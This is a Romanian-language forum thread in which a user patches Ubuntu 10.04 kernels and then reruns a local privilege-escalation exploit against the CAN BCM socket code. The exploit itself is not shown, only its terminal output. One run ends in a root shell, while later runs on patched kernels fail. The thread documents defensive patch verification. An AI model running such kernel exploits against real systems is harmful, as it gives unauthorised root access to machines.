Unpacking linux-headers-2.6.32-24-generic (from .../linux-headers-2.6.32-24-generic_2.6.32-24.42_i386.deb) ...

Preparing to replace linux-headers-generic 2.6.32.23.24 (using .../linux-headers-generic_2.6.32.24.25_i386.deb) ...

Unpacking replacement linux-headers-generic ...

Setting up linux-headers-2.6.32-24 (2.6.32-24.42) ...

Setting up linux-headers-2.6.32-24-generic (2.6.32-24.42) ...

Examining /etc/kernel/header_postinst.d.

run-parts: executing /etc/kernel/header_postinst.d/dkms 2.6.32-24-generic /boot/vmlinuz-2.6.32-24-generic

run-parts: executing /etc/kernel/header_postinst.d/nvidia-common 2.6.32-24-generic /boot/vmlinuz-2.6.32-24-generic

Setting up linux-headers-generic (2.6.32.24.25) ...

Si un clean-up: apt-get autoremove

Acum exploit-ul incercat (pentru a n oara):

eval@eval-laptop:/tmp/exploit$ ls

evil_exploit expl.c

eval@eval-laptop:/tmp/exploit$ ./evil_exploit

[+] looking for symbols...

[+] resolved symbol commit_creds to 0xc016dd80

[+] resolved symbol prepare_kernel_cred to 0xc016e0c0

[+] setting up exploit payload...

[+] creating PF_CAN socket...

[+] connecting PF_CAN socket...

[+] clearing out any active OPs via RX_DELETE...

[+] removing any active user-owned shmids...

[+] massaging kmalloc-96 SLUB cache with dummy allocations

[+] corrupting BCM OP with truncated allocation via RX_SETUP...

[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...

[+] mmap'ed mapping of length 328 at 0xb779a000

[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...

[+] seeking out the smashed shmid_kernel...

[+] discovered our smashed shmid_kernel at shmid[152] = 5636263

[+] re-smashing the shmid_kernel with exploit payload...

[+] launching root shell!

root@eval-laptop:/tmp/exploit# id

uid=0(root) gid=0(root)

root@eval-laptop:/tmp/exploit# uname -a

Linux eval-laptop 2.6.32-23-generic #37-Ubuntu SMP Fri Jun 11 07:54:58 UTC 2010 i686 GNU/Linux

root@eval-laptop:/tmp/exploit# cat /etc/issue

Ubuntu 10.04.1 LTS \n \l

root@eval-laptop:/tmp/exploit#

Deci ceva este in neregula. Ce poate sa fie?

Pe langa asta am observat ca era port 631 @ TCP deschis (IPP), am rezolvat problema urmand pasii descrisi aici: http://ubuntuforums.org/showthread.php?t=337868 .

root@eval-laptop:/home/eval# apt-get upgrade

Reading package lists... Done

Building dependency tree

Reading state information... Done

0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

root@eval-laptop:/home/eval# apt-get update

Hit http://archive.canonical.com lucid Release.gpg

Ign http://archive.canonical.com/ubuntu/ lucid/partner Translation-en_US

Hit http://archive.ubuntu.com lucid Release.gpg

Ign http://archive.ubuntu.com/ubuntu/ lucid/main Translation-en_US

Ign http://archive.ubuntu.com/ubuntu/ lucid/restricted Translation-en_US

Ign http://archive.ubuntu.com/ubuntu/ lucid/universe Translation-en_US

Ign http://archive.ubuntu.com/ubuntu/ lucid/multiverse Translation-en_US

Hit http://archive.ubuntu.com lucid-updates Release.gpg

Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/main Translation-en_US

Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/restricted Translation-en_US

Hit http://archive.canonical.com lucid Release

Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/universe Translation-en_US

Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/multiverse Translation-en_US

Hit http://archive.ubuntu.com lucid-security Release.gpg

Ign http://archive.ubuntu.com/ubuntu/ lucid-security/main Translation-en_US

Ign http://archive.ubuntu.com/ubuntu/ lucid-security/restricted Translation-en_US

Hit http://archive.canonical.com lucid/partner Packages

Ign http://archive.ubuntu.com/ubuntu/ lucid-security/universe Translation-en_US

Ign http://archive.ubuntu.com/ubuntu/ lucid-security/multiverse Translation-en_US

Hit http://archive.ubuntu.com lucid Release

Hit http://archive.ubuntu.com lucid-updates Release

Hit http://archive.canonical.com lucid/partner Sources

Hit http://archive.ubuntu.com lucid-security Release

Hit http://archive.ubuntu.com lucid/main Packages

Hit http://archive.ubuntu.com lucid/restricted Packages

Hit http://archive.ubuntu.com lucid/main Sources

Hit http://archive.ubuntu.com lucid/restricted Sources

Hit http://archive.ubuntu.com lucid/universe Packages

Hit http://archive.ubuntu.com lucid/universe Sources

Hit http://archive.ubuntu.com lucid/multiverse Packages

Hit http://archive.ubuntu.com lucid/multiverse Sources

Hit http://archive.ubuntu.com lucid-updates/main Packages

Hit http://archive.ubuntu.com lucid-updates/restricted Packages

Hit http://archive.ubuntu.com lucid-updates/main Sources

Hit http://archive.ubuntu.com lucid-updates/restricted Sources

Hit http://archive.ubuntu.com lucid-updates/universe Packages

Hit http://archive.ubuntu.com lucid-updates/universe Sources

Hit http://archive.ubuntu.com lucid-updates/multiverse Packages

Hit http://archive.ubuntu.com lucid-updates/multiverse Sources

Hit http://archive.ubuntu.com lucid-security/main Packages

Hit http://archive.ubuntu.com lucid-security/restricted Packages

Hit http://archive.ubuntu.com lucid-security/main Sources

Hit http://archive.ubuntu.com lucid-security/restricted Sources

Hit http://archive.ubuntu.com lucid-security/universe Packages

Hit http://archive.ubuntu.com lucid-security/universe Sources

Hit http://archive.ubuntu.com lucid-security/multiverse Packages

Hit http://archive.ubuntu.com lucid-security/multiverse Sources

Reading package lists... Done

root@eval-laptop:/home/eval#

Mda, si acum imi mai ignora unele surse.

/etc/apt/sources.list:

# deb cdrom:[ubuntu 10.04 LTS _Lucid Lynx_ - Release i386 (20100429)]/ lucid main restricted

# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to

# newer versions of the distribution.

deb http://archive.ubuntu.com/ubuntu lucid main restricted

deb-src http://archive.ubuntu.com/ubuntu lucid main restricted

## Major bug fix updates produced after the final release of the

## distribution.

deb http://archive.ubuntu.com/ubuntu lucid-updates main restricted

deb-src http://archive.ubuntu.com/ubuntu lucid-updates main restricted

## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu

## team. Also, please note that software in universe WILL NOT receive any

## review or updates from the Ubuntu security team.

deb http://archive.ubuntu.com/ubuntu lucid universe

deb-src http://archive.ubuntu.com/ubuntu lucid universe

deb http://archive.ubuntu.com/ubuntu lucid-updates universe

deb-src http://archive.ubuntu.com/ubuntu lucid-updates universe

## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu

## team, and may not be under a free licence. Please satisfy yourself as to

## your rights to use the software. Also, please note that software in

## multiverse WILL NOT receive any review or updates from the Ubuntu

## security team.

deb http://archive.ubuntu.com/ubuntu lucid multiverse

deb-src http://archive.ubuntu.com/ubuntu lucid multiverse

deb http://archive.ubuntu.com/ubuntu lucid-updates multiverse

deb-src http://archive.ubuntu.com/ubuntu lucid-updates multiverse

## Uncomment the following two lines to add software from the 'backports'

## repository.

## N.B. software from this repository may not have been tested as

## extensively as that contained in the main release, although it includes

## newer versions of some applications which may provide useful features.

## Also, please note that software in backports WILL NOT receive any review

## or updates from the Ubuntu security team.

# deb http://ro.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse

# deb-src http://ro.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse

## Uncomment the following two lines to add software from Canonical's

## 'partner' repository.

## This software is not part of Ubuntu, but is offered by Canonical and the

## respective vendors as a service to Ubuntu users.

deb http://archive.canonical.com/ubuntu lucid partner

deb-src http://archive.canonical.com/ubuntu lucid partner

deb http://archive.ubuntu.com/ubuntu lucid-security main restricted

deb-src http://archive.ubuntu.com/ubuntu lucid-security main restricted

deb http://archive.ubuntu.com/ubuntu lucid-security universe

deb-src http://archive.ubuntu.com/ubuntu lucid-security universe

deb http://archive.ubuntu.com/ubuntu lucid-security multiverse

deb-src http://archive.ubuntu.com/ubuntu lucid-security multiverse

Nu inteleg unde este problema.

Dist-upgrade:

apt-get dist-upgrade

Reading package lists... Done

Building dependency tree

Reading state information... Done

Calculating upgrade... Done

0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

OK, sper ca asta este ultimul edit, m-am cam saturat deja si mi-a dat cateva batai de cap, trebuia sa mai bifez ceva in "Software Sources" si anume "Pre-released updates":

screenshotph.th.png

Intr-un final dupa un restart (fortat):

root@eval-laptop:/home/eval# apt-get update

Hit http://archive.canonical.com lucid Release.gpg

Ign http://archive.canonical.com/ubuntu/ lucid/partner Translation-en_US

Hit http://archive.ubuntu.com lucid Release.gpg

Ign http://archive.ubuntu.com/ubuntu/ lucid/main Translation-en_US

Ign http://archive.ubuntu.com/ubuntu/ lucid/restricted Translation-en_US

Hit http://archive.canonical.com lucid Release

Ign http://archive.ubuntu.com/ubuntu/ lucid/universe Translation-en_US

Ign http://archive.ubuntu.com/ubuntu/ lucid/multiverse Translation-en_US

Hit http://archive.ubuntu.com lucid-updates Release.gpg

Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/main Translation-en_US

Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/restricted Translation-en_US

Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/universe Translation-en_US

Ign http://archive.ubuntu.com/ubuntu/ lucid-updates/multiverse Translation-en_US

Hit http://archive.ubuntu.com lucid-security Release.gpg

Ign http://archive.ubuntu.com/ubuntu/ lucid-security/main Translation-en_US

Ign http://archive.ubuntu.com/ubuntu/ lucid-security/restricted Translation-en_US

Ign http://archive.ubuntu.com/ubuntu/ lucid-security/universe Translation-en_US

Ign http://archive.ubuntu.com/ubuntu/ lucid-security/multiverse Translation-en_US

Hit http://archive.ubuntu.com lucid-proposed Release.gpg

Ign http://archive.ubuntu.com/ubuntu/ lucid-proposed/restricted Translation-en_US

Ign http://archive.ubuntu.com/ubuntu/ lucid-proposed/main Translation-en_US

Ign http://archive.ubuntu.com/ubuntu/ lucid-proposed/multiverse Translation-en_US

Hit http://archive.canonical.com lucid/partner Packages

Ign http://archive.ubuntu.com/ubuntu/ lucid-proposed/universe Translation-en_US

Hit http://archive.ubuntu.com lucid Release

Hit http://archive.ubuntu.com lucid-updates Release

Hit http://archive.canonical.com lucid/partner Sources

Hit http://archive.ubuntu.com lucid-security Release

Hit http://archive.ubuntu.com lucid-proposed Release

Hit http://archive.ubuntu.com lucid/main Packages

Hit http://archive.ubuntu.com lucid/restricted Packages

Hit http://archive.ubuntu.com lucid/main Sources

Hit http://archive.ubuntu.com lucid/restricted Sources

Hit http://archive.ubuntu.com lucid/universe Packages

Hit http://archive.ubuntu.com lucid/universe Sources

Hit http://archive.ubuntu.com lucid/multiverse Packages

Hit http://archive.ubuntu.com lucid/multiverse Sources

Hit http://archive.ubuntu.com lucid-updates/main Packages

Hit http://archive.ubuntu.com lucid-updates/restricted Packages

Hit http://archive.ubuntu.com lucid-updates/main Sources

Hit http://archive.ubuntu.com lucid-updates/restricted Sources

Hit http://archive.ubuntu.com lucid-updates/universe Packages

Hit http://archive.ubuntu.com lucid-updates/universe Sources

Hit http://archive.ubuntu.com lucid-updates/multiverse Packages

Hit http://archive.ubuntu.com lucid-updates/multiverse Sources

Hit http://archive.ubuntu.com lucid-security/main Packages

Hit http://archive.ubuntu.com lucid-security/restricted Packages

Hit http://archive.ubuntu.com lucid-security/main Sources

Hit http://archive.ubuntu.com lucid-security/restricted Sources

Hit http://archive.ubuntu.com lucid-security/universe Packages

Hit http://archive.ubuntu.com lucid-security/universe Sources

Hit http://archive.ubuntu.com lucid-security/multiverse Packages

Hit http://archive.ubuntu.com lucid-security/multiverse Sources

Hit http://archive.ubuntu.com lucid-proposed/restricted Packages

Hit http://archive.ubuntu.com lucid-proposed/main Packages

Hit http://archive.ubuntu.com lucid-proposed/multiverse Packages

Hit http://archive.ubuntu.com lucid-proposed/universe Packages

Reading package lists... Done

root@eval-laptop:/home/eval# apt-get upgrade

Reading package lists... Done

Building dependency tree

Reading state information... Done

0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

root@eval-laptop:/home/eval# uname -a

Linux eval-laptop 2.6.32-25-generic #43-Ubuntu SMP Wed Sep 1 09:46:39 UTC 2010 i686 GNU/Linux

root@eval-laptop:/home/eval# cat /etc/issue

Ubuntu 10.04.1 LTS \n \l

root@eval-laptop:/home/eval# exit

exit

eval@eval-laptop:~$

Am 2.6.32-25-generic. Am sa incerc iar exploit-ul si revin cu edit.

[Final edit -- hooray] WIN!

eval@eval-laptop:/tmp/exploit$ id

uid=1000(eval) gid=1000(eval) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(eval)

eval@eval-laptop:/tmp/exploit$ ./evil_expl0it

[+] looking for symbols...

[+] resolved symbol commit_creds to 0xc016dfe0

[+] resolved symbol prepare_kernel_cred to 0xc016e320

[+] setting up exploit payload...

[+] creating PF_CAN socket...

[+] connecting PF_CAN socket...

[+] clearing out any active OPs via RX_DELETE...

[+] removing any active user-owned shmids...

[+] massaging kmalloc-96 SLUB cache with dummy allocations

[+] corrupting BCM OP with truncated allocation via RX_SETUP...

[-] kernel rejected malformed CAN header

eval@eval-laptop:/tmp/exploit$ id

uid=1000(eval) gid=1000(eval) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(eval)

eval@eval-laptop:/tmp/exploit$ # ^_^ -- fixed!

Posted

Nu pot sa cred.. inca un fail :|

book@portia:~$ uname -a
Linux portia 2.6.32-24-generic-pae #41-Ubuntu SMP Thu Aug 19 02:43:57 UTC 2010 i686 GNU/Linux
book@portia:~$ gcc a.c -o a
book@portia:~$ chmod +x a
book@portia:~$ ./a
[+] looking for symbols...
[+] resolved symbol commit_creds to 0xc0176210
[+] resolved symbol prepare_kernel_cred to 0xc0176550
[+] setting up exploit payload...
[+] creating PF_CAN socket...
[+] connecting PF_CAN socket...
[+] clearing out any active OPs via RX_DELETE...
[+] removing any active user-owned shmids...
[+] massaging kmalloc-96 SLUB cache with dummy allocations
[+] corrupting BCM OP with truncated allocation via RX_SETUP...
[-] kernel rejected malformed CAN header
book@portia:~$ id
uid=1019(book) gid=1002(company) groups=1002(company)
book@portia:~$

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...